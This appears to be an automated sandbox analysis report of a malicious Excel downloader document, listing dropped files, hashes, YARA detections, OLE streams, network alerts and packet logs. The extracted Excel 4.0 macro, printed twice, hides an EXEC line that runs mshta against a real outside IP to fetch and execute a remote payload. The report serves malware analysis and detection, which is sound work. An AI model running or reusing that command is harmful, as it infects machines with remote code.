                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.5787913145367445
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCsMq/qvsqvJCwofz8hQCsMq/qvsEHyqvJCworNzj9YoHEUV+LlUVJA2:c6yofz866HnorNzjAUV+eA2
                                                                                                                    MD5:F259ABF26A431EE60FF41FFF626C8A8F
                                                                                                                    SHA1:A17ACDEB9E95318183050EFA0A629F92F2D18B19
                                                                                                                    SHA-256:D525BEFC65507F193B247DC404393739A0244D36DA52CF36F5994DA407DF436E
                                                                                                                    SHA-512:8CD16CC1CBC913182D66B305AA7BFE49D5876462F8D3354C09409C0DB5A40A7E0EB1F6589C3FAAB5C4B4F9556EF1B42909E788699BF7A586584EFA9A005154D0
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S#...Programs..f.......:...S#.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9GJ9Z9AFXFR1GJOG96FG.temp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.5787913145367445
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCsMq/qvsqvJCwofz8hQCsMq/qvsEHyqvJCworNzj9YoHEUV+LlUVJA2:c6yofz866HnorNzjAUV+eA2
                                                                                                                    MD5:F259ABF26A431EE60FF41FFF626C8A8F
                                                                                                                    SHA1:A17ACDEB9E95318183050EFA0A629F92F2D18B19
                                                                                                                    SHA-256:D525BEFC65507F193B247DC404393739A0244D36DA52CF36F5994DA407DF436E
                                                                                                                    SHA-512:8CD16CC1CBC913182D66B305AA7BFE49D5876462F8D3354C09409C0DB5A40A7E0EB1F6589C3FAAB5C4B4F9556EF1B42909E788699BF7A586584EFA9A005154D0
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S#...Programs..f.......:...S#.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                    C:\Users\user\Desktop\DETAILS-145.xls

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):77312
                                                                                                                    Entropy (8bit):5.832187394303654
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:mY+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIiQ5gQ72IotO6nitSUPU+8T:mY+nBqmIk3hbdlylKsgqopeJBWhZFGk9
                                                                                                                    MD5:5A8D06254A21564A530C4DB0FD8F05EE
                                                                                                                    SHA1:AA978D7E1D16EEA905CD0437792FC2E1EA0D3820
                                                                                                                    SHA-256:CBA8647ACD3FD4BB26675A129D8820A59ADA2B9CBF146FA422908C3B9BD9834F
                                                                                                                    SHA-512:9DF6D818DDABBA220D96598E7C2CBB7A2B3733DD6C65CF7E281735DEC024B334ED08802A38E2E94A6F4460AFF2CEC443512D74FFC2E69F3939C66C8E4B1C8679
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\DETAILS-145.xls, Author: John Lambert @JohnLaTwC
                                                                                                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\DETAILS-145.xls, Author: Joe Security
                                                                                                                    • Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Source: C:\Users\user\Desktop\DETAILS-145.xls, Author: ditekSHen
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.*.h...6..........C.a.l.i.b.r.i. .L.i.g.h.t.

                                                                                                                    C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq (copy)

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.004121873463284
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMG2UylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnzyDx6BrWt
                                                                                                                    MD5:E2294F5521E781B3E691CB764C5E07AC
                                                                                                                    SHA1:3697DC13629DECE42CA0F437FB0F0A0B0FEEE174
                                                                                                                    SHA-256:358839196733595F91A4574D36DBE91706F40782137F4565FE0ED35EF4AB27BA
                                                                                                                    SHA-512:4C302A258895C3F98578FBF74FDF142B0AD3C0305C50B7B84BBC9B8703CC7CD40AED4402347F19E3049CD9E2767FC23B1E5C4C41243D8DA7BDBACC9C961D98D2
                                                                                                                    Malicious:false
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
                                                                                                                    Entropy (8bit):5.819847251992515
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                    File name:DETAILS-145.xls
                                                                                                                    File size:77529
                                                                                                                    MD5:c15231bf03d2cde2f5d16665421d03a1
                                                                                                                    SHA1:e552fc97c08d64ac0d17c4cebf428665982600ed
                                                                                                                    SHA256:107833427623de2638b3514e51ac1241be3911cccc699e8603c7146755356bd9
                                                                                                                    SHA512:c84cedca77089327b3b19997d0b9823933c4461ed5a5d96deebb6221a9aa8a9a83c0e80c8269ccdea223ca0b08a2313d8a76b8a7afd001354ea43f2fd187b379
                                                                                                                    SSDEEP:1536:xY+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIiQ5gQ72IotO6nitSUPU+8:xY+nBqmIk3hbdlylKsgqopeJBWhZFGkZ
                                                                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:e4eea286a4b4bcb4

                                                                                                                    Static OLE Info

                                                                                                                    General

                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1

                                                                                                                    OLE File "DETAILS-145.xls"

                                                                                                                    Indicators
                                                                                                                    Has Summary Info:True
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:False
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:
                                                                                                                    Flash Objects Count:
                                                                                                                    Contains VBA Macros:True
                                                                                                                    Summary
                                                                                                                    Code Page:1251
                                                                                                                    Author:xXx
                                                                                                                    Last Saved By:xXx
                                                                                                                    Create Time:2022-01-26 22:33:31
                                                                                                                    Last Saved Time:2022-01-26 22:36:27
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:0
                                                                                                                    Document Summary
                                                                                                                    Document Code Page:1251
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Company:
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:1048576

                                                                                                                    Streams

                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.347239233907
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i m e C a r d . . . . . S h e e t 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e
                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 fc 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 b8 00 00 00
                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.264984368025
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . / . . . . . . @ . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 67009
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:67009
                                                                                                                    Entropy:6.37385915268
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c1 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                    Macro 4.0 Code

                                                                                                                    Name:Macro1
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    Macro13False0Falsepost1,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.3,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.5,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.7,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.8,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.10,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.12,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.14,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.16,10,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.18,10,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.19,10,=EXEC("cmd /c mshta http://91.240.118.168/qqw/aas/se.html")25,10,=HALT()
                                                                                                                    Name:Macro1
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    Macro13False0Falsepre1,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.3,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.5,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.7,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.8,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.10,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.12,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.14,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.16,10,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.18,10,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.19,10,=EXEC("cmd /c mshta http://91.240.118.168/qqw/aas/se.html")25,10,=HALT()

                                                                                                                    Network Behavior

                                                                                                                    Snort IDS Alerts

                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                    01/28/22-21:08:00.606825TCP2034631ET TROJAN Maldoc Activity (set)4916880192.168.2.2291.240.118.168

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 28, 2022 21:07:54.626388073 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.687632084 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.687710047 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.688672066 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.750664949 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.750778913 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.750797987 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.750813007 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.750830889 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.750852108 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.750864029 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.750880957 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.750885010 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.750894070 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.750901937 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.750911951 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.750930071 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.750930071 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.750945091 CET804916791.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:07:54.750950098 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.750967979 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.750982046 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:07:54.757657051 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:08:00.544096947 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:08:00.603722095 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.603812933 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:08:00.606825113 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:08:00.665992975 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.666024923 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.666033983 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.666167974 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:08:00.740854979 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:08:00.757833958 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.757935047 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:08:00.758121967 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:08:00.775856018 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.788583994 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.788609982 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.788625956 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.788640976 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.788652897 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:00.788656950 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:08:00.788681984 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:08:00.989733934 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:08:01.346561909 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.508537054 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.508621931 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.508800030 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.670639038 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720765114 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720797062 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720813036 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720829010 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720845938 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720863104 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720879078 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720896006 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720896006 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.720912933 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720926046 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.720928907 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.720932961 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.720969915 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.721151114 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.885634899 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.885665894 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.885735035 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.891309977 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.891343117 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.891424894 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.903476000 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.903506994 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.903559923 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.914587021 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.914618969 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.914700985 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.923605919 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.923640013 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.923732996 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.933895111 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.933936119 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.934015989 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.948951006 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.948978901 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.949073076 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.959191084 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.959217072 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.959311008 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.968645096 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.968672037 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.968765020 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:01.981344938 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.981374979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:01.981445074 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.049074888 CET804917074.208.236.157192.168.2.22
